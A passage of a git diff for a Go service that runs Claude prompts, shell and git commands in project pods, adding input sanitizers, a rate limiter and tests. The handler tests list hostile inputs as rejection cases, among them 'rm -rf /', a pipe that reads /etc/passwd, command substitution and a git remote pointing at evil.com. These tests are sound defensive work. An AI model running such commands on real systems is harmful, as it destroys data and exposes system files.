sanitize.ClaudePrompt(req.Prompt); err != nil { + api.WriteBadRequest(w, r, err.Error()) + return + } + + // Validate stream ID + if err := sanitize.StreamID(req.StreamID); err != nil { + api.WriteBadRequest(w, r, err.Error()) + return + } + // Generate command ID cmdNum := h.cmdID.Add(1) cmdID := fmt.Sprintf("cmd-%s-%03d", id, cmdNum) @@ -162,6 +175,18 @@ func (h *ProjectsHandler) RunShell(w http.ResponseWriter, r *http.Request) { return } + // Sanitize command - CRITICAL for security + if err := sanitize.ShellCommand(req.Command); err != nil { + api.WriteBadRequest(w, r, err.Error()) + return + } + + // Validate stream ID + if err := sanitize.StreamID(req.StreamID); err != nil { + api.WriteBadRequest(w, r, err.Error()) + return + } + // Generate command ID cmdNum := h.cmdID.Add(1) cmdID := fmt.Sprintf("cmd-%s-%03d", id, cmdNum) @@ -220,6 +245,18 @@ func (h *ProjectsHandler) RunGit(w http.ResponseWriter, r *http.Request) { return } + // Sanitize git args + if err := sanitize.GitArgs(req.Args); err != nil { + api.WriteBadRequest(w, r, err.Error()) + return + } + + // Validate stream ID + if err := sanitize.StreamID(req.StreamID); err != nil { + api.WriteBadRequest(w, r, err.Error()) + return + } + // Generate command ID cmdNum := h.cmdID.Add(1) cmdID := fmt.Sprintf("cmd-%s-%03d", id, cmdNum) @@ -403,3 +440,13 @@ func (sm *streamManager) Close(streamID string) { } delete(sm.streams, streamID) } + +// Registry returns the project registry for use by other handlers. +func (h *ProjectsHandler) Registry() *projects.Registry { + return h.registry +} + +// Executor returns the executor for use by other handlers. +func (h *ProjectsHandler) Executor() *executor.Executor { + return h.executor +} diff --git a/internal/handlers/projects_test.go b/internal/handlers/projects_test.go new file mode 100644 index 0000000..0d476ae --- /dev/null +++ b/internal/handlers/projects_test.go @@ -0,0 +1,464 @@ +package handlers + +import ( + "bytes" + "encoding/json" + "net/http" + "net/http/httptest" + "strings" + "testing" + + "github.com/go-chi/chi/v5" +) + +// TestProjectsHandler_List tests the List endpoint. +func TestProjectsHandler_List(t *testing.T) { + h := NewProjectsHandler() + router := chi.NewRouter() + h.Mount(router) + + req := httptest.NewRequest("GET", "/projects", nil) + rec := httptest.NewRecorder() + + router.ServeHTTP(rec, req) + + if rec.Code != http.StatusOK { + t.Errorf("Status = %d, want 200", rec.Code) + } + + var resp map[string]any + if err := json.NewDecoder(rec.Body).Decode(&resp); err != nil { + t.Fatalf("Failed to decode response: %v", err) + } + + if _, ok := resp["data"]; !ok { + t.Error("Response missing 'data' field") + } + + if _, ok := resp["meta"]; !ok { + t.Error("Response missing 'meta' field") + } +} + +// TestProjectsHandler_Get tests the Get endpoint. +func TestProjectsHandler_Get(t *testing.T) { + h := NewProjectsHandler() + router := chi.NewRouter() + h.Mount(router) + + tests := []struct { + name string + projectID string + wantStatus int + }{ + {"existing project", "pantheon", http.StatusOK}, + {"non-existent project", "nonexistent", http.StatusNotFound}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + req := httptest.NewRequest("GET", "/projects/"+tt.projectID, nil) + rec := httptest.NewRecorder() + + router.ServeHTTP(rec, req) + + if rec.Code != tt.wantStatus { + t.Errorf("Status = %d, want %d", rec.Code, tt.wantStatus) + } + }) + } +} + +// TestProjectsHandler_RunClaude tests the RunClaude endpoint. +func TestProjectsHandler_RunClaude(t *testing.T) { + h := NewProjectsHandler() + router := chi.NewRouter() + h.Mount(router) + + tests := []struct { + name string + projectID string + body any + wantStatus int + wantErr string + }{ + { + name: "valid request", + projectID: "pantheon", + body: ClaudeRequest{ + Prompt: "Hello, world!", + }, + wantStatus: http.StatusCreated, + }, + { + name: "missing prompt", + projectID: "pantheon", + body: ClaudeRequest{ + Prompt: "", + }, + wantStatus: http.StatusBadRequest, + wantErr: "prompt is required", + }, + { + name: "project not found", + projectID: "nonexistent", + body: ClaudeRequest{Prompt: "test"}, + wantStatus: http.StatusNotFound, + }, + { + name: "null byte in prompt", + projectID: "pantheon", + body: ClaudeRequest{ + Prompt: "Hello\x00World", + }, + wantStatus: http.StatusBadRequest, + wantErr: "null byte", + }, + { + name: "invalid stream ID", + projectID: "pantheon", + body: ClaudeRequest{ + Prompt: "Hello", + StreamID: "invalid stream id with spaces", + }, + wantStatus: http.StatusBadRequest, + wantErr: "alphanumeric", + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + body, _ := json.Marshal(tt.body) + req := httptest.NewRequest("POST", "/projects/"+tt.projectID+"/claude", bytes.NewReader(body)) + req.Header.Set("Content-Type", "application/json") + rec := httptest.NewRecorder() + + router.ServeHTTP(rec, req) + + if rec.Code != tt.wantStatus { + t.Errorf("Status = %d, want %d. Body: %s", rec.Code, tt.wantStatus, rec.Body.String()) + } + + if tt.wantErr != "" { + if !strings.Contains(rec.Body.String(), tt.wantErr) { + t.Errorf("Body = %q, want to contain %q", rec.Body.String(), tt.wantErr) + } + } + }) + } +} + +// TestProjectsHandler_RunShell tests the RunShell endpoint. +func TestProjectsHandler_RunShell(t *testing.T) { + h := NewProjectsHandler() + router := chi.NewRouter() + h.Mount(router) + + tests := []struct { + name string + projectID string + body any + wantStatus int + wantErr string + }{ + { + name: "valid command", + projectID: "pantheon", + body: ShellRequest{ + Command: "ls -la", + }, + wantStatus: http.StatusCreated, + }, + { + name: "missing command", + projectID: "pantheon", + body: ShellRequest{ + Command: "", + }, + wantStatus: http.StatusBadRequest, + wantErr: "command is required", + }, + { + name: "dangerous command with semicolon", + projectID: "pantheon", + body: ShellRequest{ + Command: "ls; rm -rf /", + }, + wantStatus: http.StatusBadRequest, + wantErr: "command chaining", + }, + { + name: "dangerous command with pipe", + projectID: "pantheon", + body: ShellRequest{ + Command: "cat /etc/passwd | grep root", + }, + wantStatus: http.StatusBadRequest, + wantErr: "command chaining", + }, + { + name: "command substitution", + projectID: "pantheon", + body: ShellRequest{ + Command: "echo $(whoami)", + }, + wantStatus: http.StatusBadRequest, + wantErr: "command chaining", + }, + { + name: "redirect", + projectID: "pantheon", + body: ShellRequest{ + Command: "ls > /tmp/out.txt", + }, + wantStatus: http.StatusBadRequest, + wantErr: "redirect", + }, + { + name: "rm rf root", + projectID: "pantheon", + body: ShellRequest{ + Command: "rm -rf /", + }, + wantStatus: http.StatusBadRequest, + wantErr: "destructive rm", + }, + { + name: "project not found", + projectID: "nonexistent", + body: ShellRequest{Command: "ls"}, + wantStatus: http.StatusNotFound, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + body, _ := json.Marshal(tt.body) + req := httptest.NewRequest("POST", "/projects/"+tt.projectID+"/shell", bytes.NewReader(body)) + req.Header.Set("Content-Type", "application/json") + rec := httptest.NewRecorder() + + router.ServeHTTP(rec, req) + + if rec.Code != tt.wantStatus { + t.Errorf("Status = %d, want %d. Body: %s", rec.Code, tt.wantStatus, rec.Body.String()) + } + + if tt.wantErr != "" { + if !strings.Contains(rec.Body.String(), tt.wantErr) { + t.Errorf("Body = %q, want to contain %q", rec.Body.String(), tt.wantErr) + } + } + }) + } +} + +// TestProjectsHandler_RunGit tests the RunGit endpoint. +func TestProjectsHandler_RunGit(t *testing.T) { + h := NewProjectsHandler() + router := chi.NewRouter() + h.Mount(router) + + tests := []struct { + name string + projectID string + body any + wantStatus int + wantErr string + }{ + { + name: "valid git status", + projectID: "pantheon", + body: GitRequest{ + Args: []string{"status"}, + }, + wantStatus: http.StatusCreated, + }, + { + name: "valid git log", + projectID: "pantheon", + body: GitRequest{ + Args: []string{"log", "--oneline", "-10"}, + }, + wantStatus: http.StatusCreated, + }, + { + name: "missing args", + projectID: "pantheon", + body: GitRequest{ + Args: []string{}, + }, + wantStatus: http.StatusBadRequest, + wantErr: "args is required", + }, + { + name: "git config blocked", + projectID: "pantheon", + body: GitRequest{ + Args: []string{"config", "--global", "user.name", "attacker"}, + }, + wantStatus: http.StatusBadRequest, + wantErr: "git config", + }, + { + name: "git remote blocked", + projectID: "pantheon", + body: GitRequest{ + Args: []string{"remote", "add", "evil", "https://evil.com/repo"}, + }, + wantStatus: http.StatusBadRequest, + wantErr: "git remote", + }, + { + name: "force push blocked", + projectID: "pantheon", + body: GitRequest{ + Args: []string{"push", "-f", "origin", "main"}, + }, + wantStatus: http.StatusBadRequest, + wantErr: "force push", + }, + { + name: "project not found", + projectID: "nonexistent", + body: GitRequest{Args: []string{"status"}}, + wantStatus: http.StatusNotFound, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + body, _ := json.Marshal(tt.body) + req := httptest.NewRequest("POST", "/projects/"+tt.projectID+"/git", bytes.NewReader(body)) + req.Header.Set("Content-Type", "application/json") + rec := httptest.NewRecorder() + + router.ServeHTTP(rec, req) + + if rec.Code != tt.wantStatus { + t.Errorf("Status = %d, want %d. Body: %s", rec.Code, tt.wantStatus, rec.Body.String()) + } + + if tt.wantErr != "" { + if !strings.Contains(rec.Body.String(), tt.wantErr) { + t.Errorf("Body = %q, want to contain %q", rec.Body.String(), tt.wantErr) + } + } + }) + } +} + +// TestProjectsHandler_Events tests the Events SSE endpoint. +func TestProjectsHandler_Events(t *testing.T) { + h := NewProjectsHandler() + router := chi.NewRouter() + h.Mount(router) + + // Note: SSE tests with headers are difficult in httptest because the + // handler blocks waiting for events. We test what we can without blocking. + + t.Run("project not found", func(t *testing.T) { + req := httptest.NewRequest("GET", "/projects/nonexistent/events", nil) + rec := httptest.NewRecorder() + + router.ServeHTTP(rec, req) + + if rec.Code != http.StatusNotFound { + t.Errorf("Status = %d, want 404", rec.Code) + } + }) +} + +// TestProjectsHandler_InvalidJSON tests handling of invalid JSON bodies. +func TestProjectsHandler_InvalidJSON(t *testing.T) { + h := NewProjectsHandler() + router := chi.NewRouter() + h.Mount(router) + + endpoints := []struct { + method string + path string + }{ + {"POST", "/projects/pantheon/claude"}, + {"POST", "/projects/pantheon/shell"}, + {"POST", "/projects/pantheon/git"}, + } + + for _, ep := range endpoints { + t.Run(ep.path, func(t *testing.T) { + req := httptest.NewRequest(ep.method, ep.path, strings.NewReader("invalid json{")) + req.Header.Set("Content-Type", "application/json") + rec := httptest.NewRecorder() + + router.ServeHTTP(rec, req) + + if rec.Code != http.StatusBadRequest { + t.Errorf("Status = %d, want 400. Body: %s", rec.Code, rec.Body.String()) + } + + if !strings.Contains(rec.Body.String(), "invalid") { + t.Errorf("Body = %q, want to contain 'invalid'", rec.Body.String()) + } + }) + } +} + +// TestCommandIDGeneration tests that command IDs are generated correctly. +func TestCommandIDGeneration(t *testing.T) { + h := NewProjectsHandler() + router := chi.NewRouter() + h.Mount(router) + + // Send two requests and verify they get different command IDs + body := ClaudeRequest{Prompt: "test"} + bodyBytes, _ := json.Marshal(body) + + req1 := httptest.NewRequest("POST", "/projects/pantheon/claude", bytes.NewReader(bodyBytes)) + req1.Header.Set("Content-Type", "application/json") + rec1 := httptest.NewRecorder() + router.ServeHTTP(rec1, req1) + + req2 := httptest.NewRequest("POST", "/projects/pantheon/claude", bytes.NewReader(bodyBytes)) + req2.Header.Set("Content-Type", "application/json") + rec2 := httptest.NewRecorder() + router.ServeHTTP(rec2, req2) + + // Parse both responses + var resp1, resp2 map[string]any + json.NewDecoder(bytes.NewReader(rec1.Body.Bytes())).Decode(&resp1) + json.NewDecoder(bytes.NewReader(rec2.Body.Bytes())).Decode(&resp2) + + data1, _ := resp1["data"].(map[string]any) + data2, _ := resp2["data"].(map[string]any) + + if data1["id"] == data2["id"] { + t.Error("Two requests should have different command IDs") + } +} + +// TestCustomStreamID tests that custom stream IDs are used when provided. +func TestCustomStreamID(t *testing.T) { + h := NewProjectsHandler() + router := chi.NewRouter() + h.Mount(router) + + body := ClaudeRequest{ + Prompt: "test", + StreamID: "my-custom-stream-id", + } + bodyBytes, _ := json.Marshal(body) + + req := httptest.NewRequest("POST", "/projects/pantheon/claude", bytes.NewReader(bodyBytes)) + req.Header.Set("Content-Type", "application/json") + rec := httptest.NewRecorder() + router.ServeHTTP(rec, req) + + var resp map[string]any + json.NewDecoder(rec.Body).Decode(&resp) + + data, _ := resp["data"].(map[string]any) + + if data["id"] != "my-custom-stream-id" { + t.Errorf("Command ID = %v, want my-custom-stream-id", data["id"]) + } +} diff --git a/internal/port/apikey_repository.go b/internal/port/apikey_repository.go new file mode 100644 index 0000000..a9a572a --- /dev/null +++ b/internal/port/apikey_repository.go @@ -0,0 +1,28 @@ +package port + +import ( + "context" + + "github.com/orchard9/rdev/internal/domain" +) + +// APIKeyRepository defines operations for managing API keys. +type APIKeyRepository interface { + // Create stores a new API key. + Create(ctx context.Context, key *domain.APIKey, keyHash string) error + + // GetByHash retrieves an API key by its hash. + GetByHash(ctx context.Context, keyHash string) (*domain.APIKey, error) + + // Get retrieves an API key by ID. + Get(ctx context.Context, id domain.APIKeyID) (*domain.APIKey, error) + + // List returns all API keys (without secrets). + List(ctx context.Context) ([]*domain.APIKey, error) + + // Revoke marks an API key as revoked. + Revoke(ctx context.Context, id domain.APIKeyID) error + + // UpdateLastUsed updates the last used timestamp for a key. + UpdateLastUsed(ctx context.Context, id domain.APIKeyID) error +} diff --git a/internal/port/command_executor.go b/internal/port/command_executor.go new file mode 100644 index 0000000..1d99d57 --- /dev/null +++ b/internal/port/command_executor.go @@ -0,0 +1,22 @@ +package port + +import ( + "context" + + "github.com/orchard9/rdev/internal/domain" +) + +// CommandExecutor defines operations for executing commands in pods. +type CommandExecutor interface { + // Execute runs a command in the target pod and streams output to the handler. + Execute(ctx context.Context, cmd *domain.Command, podName string, handler domain.OutputHandler) (*domain.CommandResult, error) + + // Cancel attempts to cancel a running command. + Cancel(ctx context.Context, cmdID domain.CommandID) error + + // PodExists checks if a pod exists and is running. + PodExists(ctx context.Context, podName string) (bool, error) + + // CheckConnection verifies connectivity to the Kubernetes cluster. + CheckConnection(ctx context.Context) error +} diff --git a/internal/port/project_repository.go b/internal/port/project_repository.go new file mode 100644 index 0000000..256943a --- /dev/null +++ b/internal/port/project_repository.go @@ -0,0 +1,31 @@ +// Package port defines interfaces (ports) for external dependencies. +// These interfaces define the contracts between the application core and +// infrastructure adapters, enabling testability and flexibility. +package port + +import ( + "context" + + "github.com/orchard9/rdev/internal/domain" +) + +// ProjectRepository defines operations for managing projects. +type ProjectRepository interface { + // List returns all available projects. + List(ctx context.Context) ([]domain.Project, error) + + // Get returns a project by ID. + Get(ctx context.Context, id domain.ProjectID) (*domain.Project, error) + + // Exists checks if a project exists. + Exists(ctx context.Context, id domain.ProjectID) (bool, error) + + // Register adds a new project to the repository. + Register(ctx context.Context, project *domain.Project) error + + // Unregister removes a project from the repository. + Unregister(ctx context.Context, id domain.ProjectID) error + + // RefreshStatus updates the status of all projects. + RefreshStatus(ctx context.Context) error +} diff --git a/internal/port/stream_publisher.go b/internal/port/stream_publisher.go new file mode 100644 index 0000000..8d14581 --- /dev/null +++ b/internal/port/stream_publisher.go @@ -0,0 +1,20 @@ +package port + +// StreamEvent represents an event to be published on a stream. +type StreamEvent struct { + Type string + Data map[string]any +} + +// StreamPublisher defines operations for managing SSE event streams. +type StreamPublisher interface { + // Subscribe creates a subscription to events for the given stream ID. + // Returns a channel that will receive events and a cleanup function. + Subscribe(streamID string) (<-chan StreamEvent, func()) + + // Publish sends an event to all subscribers of a stream. + Publish(streamID string, event StreamEvent) + + // Close closes a stream and all its subscriptions. + Close(streamID string) +} diff --git a/internal/ratelimit/ratelimit.go b/internal/ratelimit/ratelimit.go new file mode 100644 index 0000000..18fb1f8 --- /dev/null +++ b/internal/ratelimit/ratelimit.go @@ -0,0 +1,272 @@ +// Package ratelimit provides rate limiting middleware for HTTP handlers. +package ratelimit + +import ( + "net/http" + "sync" + "time" + + "github.com/orchard9/rdev/internal/auth" + "github.com/orchard9/rdev/pkg/api" +) + +// Config defines rate limit parameters. +type Config struct { + // RequestsPerMinute is the average rate limit. + RequestsPerMinute int + + // BurstSize is the maximum number of requests allowed in a burst. + // Defaults to RequestsPerMinute / 2 if not set. + BurstSize int + + // CleanupInterval is how often to clean up stale entries. + // Defaults to 5 minutes. + CleanupInterval time.Duration + + // KeyFunc extracts the rate limit key from a request. + // Defaults to using the API key ID from context. + KeyFunc func(*http.Request) string +} + +// DefaultConfig returns a sensible default configuration. +func DefaultConfig() Config { + return Config{ + RequestsPerMinute: 100, + BurstSize: 50, + CleanupInterval: 5 * time.Minute, + } +} + +// Limiter implements token bucket rate limiting. +type Limiter struct { + cfg Config + buckets map[string]*bucket + mu sync.RWMutex + stopCh chan struct{} +} + +type bucket struct { + tokens float64 + lastUpdate time.Time +} + +// New creates a new rate limiter with the given configuration. +func New(cfg Config) *Limiter { + if cfg.RequestsPerMinute <= 0 { + cfg.RequestsPerMinute = 100 + } + if cfg.BurstSize <= 0 { + cfg.BurstSize = cfg.RequestsPerMinute / 2 + if cfg.BurstSize < 1 { + cfg.BurstSize = 1 + } + } + if cfg.CleanupInterval <= 0 { + cfg.CleanupInterval = 5 * time.Minute + } + + l := &Limiter{ + cfg: cfg, + buckets: make(map[string]*bucket), + stopCh: make(chan struct{}), + } + + // Start cleanup goroutine + go l.cleanup() + + return l +} + +// Stop stops the background cleanup goroutine. +func (l *Limiter) Stop() { + close(l.stopCh) +} + +// Allow checks if a request is allowed under the rate limit. +// Returns remaining tokens and whether the request is allowed. +func (l *Limiter) Allow(key string) (remaining int, allowed bool) { + now := time.Now() + + l.mu.Lock() + defer l.mu.Unlock() + + b, exists := l.buckets[key] + if !exists { + b = &bucket{ + tokens: float64(l.cfg.BurstSize), + lastUpdate: now, + } + l.buckets[key] = b + } + + // Refill tokens based on time elapsed + elapsed := now.Sub(b.lastUpdate).Seconds() + rate := float64(l.cfg.RequestsPerMinute) / 60.0 // tokens per second + b.tokens += elapsed * rate + if b.tokens > float64(l.cfg.BurstSize) { + b.tokens = float64(l.cfg.BurstSize) + } + b.lastUpdate = now + + // Try to consume a token + if b.tokens >= 1 { + b.tokens-- + return int(b.tokens), true + } + + return 0, false +} + +// Middleware returns an HTTP middleware that enforces rate limits. +func (l *Limiter) Middleware() func(http.Handler) http.Handler { + return func(next http.Handler) http.Handler { + return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + // Get the rate limit key + key := l.getKey(r) + if key == "" { + // No key means no rate limiting (e.g., health checks) + next.ServeHTTP(w, r) + return + } + + remaining, allowed := l.Allow(key) + + // Set rate limit headers + w.Header().Set("X-RateLimit-Limit", itoa(l.cfg.RequestsPerMinute)) + w.Header().Set("X-RateLimit-Remaining", itoa(remaining)) + + if !allowed { + // Calculate retry time + retryAfter := 60.0 / float64(l.cfg.RequestsPerMinute) + w.Header().Set("Retry-After", itoa(int(retryAfter)+1)) + api.WriteError(w, r, http.StatusTooManyRequests, "RATE_LIMITED", + "Rate limit exceeded. Please retry later.") + return + } + + next.ServeHTTP(w, r) + }) + } +} + +func (l *Limiter) getKey(r *http.Request) string { + // Use custom key function if provided + if l.cfg.KeyFunc != nil { + return l.cfg.KeyFunc(r) + } + + // Default: use API key ID from context + // This requires the auth middleware to run first + if apiKey := auth.GetAPIKey(r.Context()); apiKey != nil { + return apiKey.ID + } + + // Fallback: use client IP + return getClientIP(r) +} + +func (l *Limiter) cleanup() { + ticker := time.NewTicker(l.cfg.CleanupInterval) + defer ticker.Stop() + + for { + select { + case <-l.stopCh: + return + case <-ticker.C: + l.doCleanup() + } + } +} + +func (l *Limiter) doCleanup() { + l.mu.Lock() + defer l.mu.Unlock() + + // Remove buckets that haven't been used in 2x cleanup interval + threshold := time.Now().Add(-2 * l.cfg.CleanupInterval) + + for key, b := range l.buckets { + if b.lastUpdate.Before(threshold) { + delete(l.buckets, key) + } + } +} + +// getClientIP extracts the client IP from the request. +func getClientIP(r *http.Request) string { + // Check X-Forwarded-For header (set by proxies/load balancers) + if xff := r.Header.Get("X-Forwarded-For"); xff != "" { + // Take the first IP in the chain + for i := 0; i < len(xff); i++ { + if xff[i] == ',' { + return xff[:i] + } + } + return xff + } + + // Check X-Real-IP header + if xri := r.Header.Get("X-Real-IP"); xri != "" { + return xri + } + + // Fall back to RemoteAddr + // RemoteAddr is "IP:port", so strip the port + addr := r.RemoteAddr + for i := len(addr) - 1; i >= 0; i-- { + if addr[i] == ':' { + return addr[:i] + } + } + return addr +} + +// itoa converts an integer to a string without importing strconv. +func itoa(i int) string { + if i == 0 { + return "0" + } + + negative := i < 0 + if negative { + i = -i + } + + // Max int64 is 19 digits + buf := make([]byte, 0, 20) + + for i > 0 { + buf = append(buf, byte('0'+i%10)) + i /= 10 + } + + if negative { + buf = append(buf, '-') + } + + // Reverse + for left, right := 0, len(buf)-1; left < right; left, right = left+1, right-1 { + buf[left], buf[right] = buf[right], buf[left] + } + + return string(buf) +} + +// KeyFromAPIKey creates a KeyFunc that extracts the API key ID for rate limiting. +// This is useful when you want to rate limit by API key rather than IP. +func KeyFromAPIKey() func(*http.Request) string { + return func(r *http.Request) string { + if apiKey := auth.GetAPIKey(r.Context()); apiKey != nil { + return apiKey.ID + } + return getClientIP(r) + } +} + +// KeyFromIP creates a KeyFunc that uses client IP for rate limiting. +func KeyFromIP() func(*http.Request) string { + return func(r *http.Request) string { + return getClientIP(r) + } +} diff --git a/internal/ratelimit/ratelimit_test.go b/internal/ratelimit/ratelimit_test.go new file mode 100644 index 0000000..cebc6fb --- /dev/null +++ b/internal/ratelimit/ratelimit_test.go @@ -0,0 +1,413 @@ +package ratelimit + +import ( + "net/http" + "net/http/httptest" + "sync" + "testing" + "time" + + "github.com/orchard9/rdev/internal/auth" +) + +func TestNew(t *testing.T) { + t.Run("default config", func(t *testing.T) { + l := New(Config{}) + defer l.Stop() + + if l.cfg.RequestsPerMinute != 100 { + t.Errorf("RequestsPerMinute = %d, want 100", l.cfg.RequestsPerMinute) + } + if l.cfg.BurstSize != 50 { + t.Errorf("BurstSize = %d, want 50", l.cfg.BurstSize) + } + }) + + t.Run("custom config", func(t *testing.T) { + l := New(Config{ + RequestsPerMinute: 200, + BurstSize: 100, + CleanupInterval: time.Minute, + }) + defer l.Stop() + + if l.cfg.RequestsPerMinute != 200 { + t.Errorf("RequestsPerMinute = %d, want 200", l.cfg.RequestsPerMinute) + } + if l.cfg.BurstSize != 100 { + t.Errorf("BurstSize = %d, want 100", l.cfg.BurstSize) + } + }) +} + +func TestDefaultConfig(t *testing.T) { + cfg := DefaultConfig() + + if cfg.RequestsPerMinute != 100 { + t.Errorf("RequestsPerMinute = %d, want 100", cfg.RequestsPerMinute) + } + if cfg.BurstSize != 50 { + t.Errorf("BurstSize = %d, want 50", cfg.BurstSize) + } + if cfg.CleanupInterval != 5*time.Minute { + t.Errorf("CleanupInterval = %v, want 5m", cfg.CleanupInterval) + } +} + +func TestAllow(t *testing.T) { + t.Run("allows requests within limit", func(t *testing.T) { + l := New(Config{ + RequestsPerMinute: 60, + BurstSize: 10, + }) + defer l.Stop() + + // Should allow burst requests + for i := 0; i < 10; i++ { + remaining, allowed := l.Allow("test-key") + if !allowed { + t.Errorf("Request %d was denied, want allowed", i) + } + if remaining != 10-i-1 { + t.Errorf("Request %d: remaining = %d, want %d", i, remaining, 10-i-1) + } + } + }) + + t.Run("denies requests exceeding limit", func(t *testing.T) { + l := New(Config{ + RequestsPerMinute: 60, + BurstSize: 5, + }) + defer l.Stop() + + // Exhaust the bucket + for i := 0; i < 5; i++ { + l.Allow("test-key") + } + + // Next request should be denied + _, allowed := l.Allow("test-key") + if allowed { + t.Error("Request was allowed, want denied") + } + }) + + t.Run("refills over time", func(t *testing.T) { + l := New(Config{ + RequestsPerMinute: 60, // 1 per second + BurstSize: 1, + }) + defer l.Stop() + + // Use the one token + l.Allow("test-key") + + // Should be denied immediately + _, allowed := l.Allow("test-key") + if allowed { + t.Error("Request was allowed immediately, want denied") + } + + // Wait for refill (1 token per second) + time.Sleep(1100 * time.Millisecond) + + // Should be allowed now + _, allowed = l.Allow("test-key") + if !allowed { + t.Error("Request was denied after refill, want allowed") + } + }) + + t.Run("separate buckets per key", func(t *testing.T) { + l := New(Config{ + RequestsPerMinute: 60, + BurstSize: 1, + }) + defer l.Stop() + + // Exhaust key1 + l.Allow("key1") + _, allowed1 := l.Allow("key1") + if allowed1 { + t.Error("key1 was allowed, want denied") + } + + // key2 should still have tokens + _, allowed2 := l.Allow("key2") + if !allowed2 { + t.Error("key2 was denied, want allowed") + } + }) +} + +func TestMiddleware(t *testing.T) { + handler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(http.StatusOK) + w.Write([]byte("OK")) + }) + + t.Run("allows requests within limit", func(t *testing.T) { + l := New(Config{ + RequestsPerMinute: 100, + BurstSize: 10, + KeyFunc: KeyFromIP(), + }) + defer l.Stop() + + middleware := l.Middleware() + wrapped := middleware(handler) + + req := httptest.NewRequest("GET", "/test", nil) + req.RemoteAddr = "192.168.1.1:12345" + rec := httptest.NewRecorder() + + wrapped.ServeHTTP(rec, req) + + if rec.Code != http.StatusOK { + t.Errorf("Status = %d, want 200", rec.Code) + } + if rec.Header().Get("X-RateLimit-Limit") != "100" { + t.Errorf("X-RateLimit-Limit = %q, want 100", rec.Header().Get("X-RateLimit-Limit")) + } + }) + + t.Run("returns 429 when rate limited", func(t *testing.T) { + l := New(Config{ + RequestsPerMinute: 60, + BurstSize: 1, + KeyFunc: KeyFromIP(), + }) + defer l.Stop() + + middleware := l.Middleware() + wrapped := middleware(handler) + + // First request should succeed + req1 := httptest.NewRequest("GET", "/test", nil) + req1.RemoteAddr = "192.168.1.1:12345" + rec1 := httptest.NewRecorder() + wrapped.ServeHTTP(rec1, req1) + + if rec1.Code != http.StatusOK { + t.Errorf("First request status = %d, want 200", rec1.Code) + } + + // Second request should be rate limited + req2 := httptest.NewRequest("GET", "/test", nil) + req2.RemoteAddr = "192.168.1.1:12345" + rec2 := httptest.NewRecorder() + wrapped.ServeHTTP(rec2, req2) + + if rec2.Code != http.StatusTooManyRequests { + t.Errorf("Second request status = %d, want 429", rec2.Code) + } + if rec2.Header().Get("Retry-After") == "" { + t.Error("Retry-After header not set") + } + }) + + t.Run("no key means no rate limiting", func(t *testing.T) { + l := New(Config{ + RequestsPerMinute: 60, + BurstSize: 1, + KeyFunc: func(r *http.Request) string { + return "" // No key + }, + }) + defer l.Stop() + + middleware := l.Middleware() + wrapped := middleware(handler) + + // Multiple requests should all succeed + for i := 0; i < 5; i++ { + req := httptest.NewRequest("GET", "/test", nil) + rec := httptest.NewRecorder() + wrapped.ServeHTTP(rec, req) + + if rec.Code != http.StatusOK { + t.Errorf("Request %d status = %d, want 200", i, rec.Code) + } + } + }) +} + +func TestGetClientIP(t *testing.T) { + tests := []struct { + name string + remoteAddr string + xff string + xri string + want string + }{ + {"from RemoteAddr", "192.168.1.1:12345", "", "", "192.168.1.1"}, + {"from X-Forwarded-For single", "127.0.0.1:8080", "10.0.0.1", "", "10.0.0.1"}, + {"from X-Forwarded-For multiple", "127.0.0.1:8080", "10.0.0.1, 10.0.0.2", "", "10.0.0.1"}, + {"from X-Real-IP", "127.0.0.1:8080", "", "10.0.0.5", "10.0.0.5"}, + {"X-Forwarded-For takes precedence", "127.0.0.1:8080", "10.0.0.1", "10.0.0.5", "10.0.0.1"}, + {"no port in RemoteAddr", "192.168.1.1", "", "", "192.168.1.1"}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + req := httptest.NewRequest("GET", "/", nil) + req.RemoteAddr = tt.remoteAddr + if tt.xff != "" { + req.Header.Set("X-Forwarded-For", tt.xff) + } + if tt.xri != "" { + req.Header.Set("X-Real-IP", tt.xri) + } + + got := getClientIP(req) + if got != tt.want { + t.Errorf("getClientIP() = %q, want %q", got, tt.want) + } + }) + } +} + +func TestKeyFromAPIKey(t *testing.T) { + keyFunc := KeyFromAPIKey() + + t.Run("extracts from context", func(t *testing.T) { + req := httptest.NewRequest("GET", "/", nil) + apiKey := &auth.APIKey{ID: "test-key-123"} + ctx := auth.WithAPIKey(req.Context(), apiKey) + req = req.WithContext(ctx) + + got := keyFunc(req) + if got != "test-key-123" { + t.Errorf("KeyFromAPIKey() = %q, want test-key-123", got) + } + }) + + t.Run("falls back to IP", func(t *testing.T) { + req := httptest.NewRequest("GET", "/", nil) + req.RemoteAddr = "192.168.1.100:12345" + + got := keyFunc(req) + if got != "192.168.1.100" { + t.Errorf("KeyFromAPIKey() = %q, want 192.168.1.100", got) + } + }) +} + +func TestKeyFromIP(t *testing.T) { + keyFunc := KeyFromIP() + + req := httptest.NewRequest("GET", "/", nil) + req.RemoteAddr = "10.0.0.50:12345" + + got := keyFunc(req) + if got != "10.0.0.50" { + t.Errorf("KeyFromIP() = %q, want 10.0.0.50", got) + } +} + +func TestItoa(t *testing.T) { + tests := []struct { + input int + want string + }{ + {0, "0"}, + {1, "1"}, + {10, "10"}, + {100, "100"}, + {12345, "12345"}, + {-1, "-1"}, + {-12345, "-12345"}, + } + + for _, tt := range tests { + t.Run(tt.want, func(t *testing.T) { + got := itoa(tt.input) + if got != tt.want { + t.Errorf("itoa(%d) = %q, want %q", tt.input, got, tt.want) + } + }) + } +} + +func TestConcurrentAccess(t *testing.T) { + l := New(Config{ + RequestsPerMinute: 1000, + BurstSize: 100, + }) + defer l.Stop() + + var wg sync.WaitGroup + var allowedCount, deniedCount int64 + var mu sync.Mutex + + // Spawn many goroutines making requests + for i := 0; i < 200; i++ { + wg.Add(1) + go func() { + defer wg.Done() + _, allowed := l.Allow("concurrent-test") + mu.Lock() + if allowed { + allowedCount++ + } else { + deniedCount++ + } + mu.Unlock() + }() + } + + wg.Wait() + + // Should have allowed approximately BurstSize requests + // and denied the rest + if allowedCount < 90 || allowedCount > 110 { + t.Errorf("allowedCount = %d, want ~100", allowedCount) + } + if deniedCount < 90 || deniedCount > 110 { + t.Errorf("deniedCount = %d, want 